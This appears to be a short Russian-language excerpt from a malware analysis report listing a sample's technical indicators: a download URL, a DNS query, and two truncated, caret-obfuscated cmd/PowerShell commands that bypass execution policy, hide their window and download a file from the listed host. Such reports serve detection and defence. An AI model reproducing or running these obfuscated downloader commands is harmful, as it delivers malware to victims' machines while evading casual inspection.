Техническая информация
- http://lolotocoporo.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwErsHeL^L^.eXe -EX^e^cU^TI^oN^P^o^li^Cy bYP^AsS^ ^-N^O^prOFiL^e^ -w^in^Dow^Sty^L^e ^H^ID^dE^N (nEW-OB^jE^c^T Sy^St^E^m^.^NEt^.weBCL^ie^nt).DOwN^LOA^D^fil^E(^'http://lolotocopo...
- DNS ASK lo####coporo.wang
- '<SYSTEM32>\cmd.exe' /C "POwErsHeL^L^.eXe -EX^e^cU^TI^oN^P^o^li^Cy bYP^AsS^ ^-N^O^prOFiL^e^ -w^in^Dow^Sty^L^e ^H^ID^dE^N (nEW-OB^jE^c^T Sy^St^E^m^.^NEt^.weBCL^ie^nt).DOwN^LOA^D^fil^E(^'http://lolotocopo...' (со скрытым окном)